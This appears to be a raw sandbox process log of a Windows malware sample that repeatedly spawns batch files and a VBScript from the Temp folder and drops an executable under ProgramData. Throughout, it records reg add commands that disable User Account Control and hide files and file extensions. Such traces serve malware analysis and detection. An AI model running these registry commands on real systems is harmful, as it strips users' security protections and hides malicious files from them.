C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vgsccMkQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nAIAEAMU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iUkQMUYM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uKAgkIgc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YWAYcQwo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QocIUQQs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scgkMkIE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WcEkowkY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fiocIogA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jSsoQoIs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jiQIMYIM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DIkAwMYo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qggEkwwk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SMUUocgg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QQQcAEUg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\ProgramData\eGssYows\oOQkUUEo.exe
"C:\ProgramData\eGssYows\oOQkUUEo.exe"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MqIgUUso.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wiocEAUY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ioggcosY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DWsoAkwo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nsQAgQYs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mAwQkIUg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qEUcQskU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YyIAIMAY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bCAwUswQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nWcAAkEU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BAMwEAoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
